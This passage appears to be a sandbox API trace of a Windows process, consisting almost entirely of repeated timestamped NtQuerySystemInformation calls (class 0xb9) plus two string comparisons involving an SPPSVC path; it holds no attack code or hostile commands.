NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.811] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0240.849] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.852] NtQuerySystemInformation 